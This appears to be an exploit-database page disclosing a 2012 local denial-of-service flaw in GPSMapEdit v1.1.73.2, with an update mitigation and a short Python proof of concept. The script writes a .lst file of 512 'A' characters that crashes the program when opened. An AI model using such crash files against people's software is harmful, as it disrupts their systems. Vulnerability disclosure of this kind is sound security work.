header-logo
Suggest Exploit
vendor:
GPSMapEdit
by:
Julien Ahrens
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: GPSMapEdit
Affected Version From: 1.1.73.2
Affected Version To: 1.1.73.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:geopainting:gpsmapedit
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 Professional German / Windows 7 Professional 64bit German
2012

GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability

GPSMapEdit v1.1.73.2 is vulnerable to a local denial of service attack. By creating a specially crafted .lst file containing 512 'A' characters, an attacker can cause the application to crash when the file is opened.

Mitigation:

Update to the latest version of GPSMapEdit.
Source

Exploit-DB raw data:

#!/usr/bin/python
 
# Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability
# Version:       1.1.73.2
# Date:          2012-01-08
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://www.geopainting.com
# Tested on:     Windows XP SP3 Professional German / Windows 7 Professional 64bit German
 
file="GPSMapEdit_crash.lst"
junk="\x41"*512

print "[*] Creating crash file...\n";
writeFile = open (file, "w")
writeFile.write(junk)
writeFile.close()
print "[*] File successfully created!\n\n";

Navigation

Suggest Exploit

Services By CQR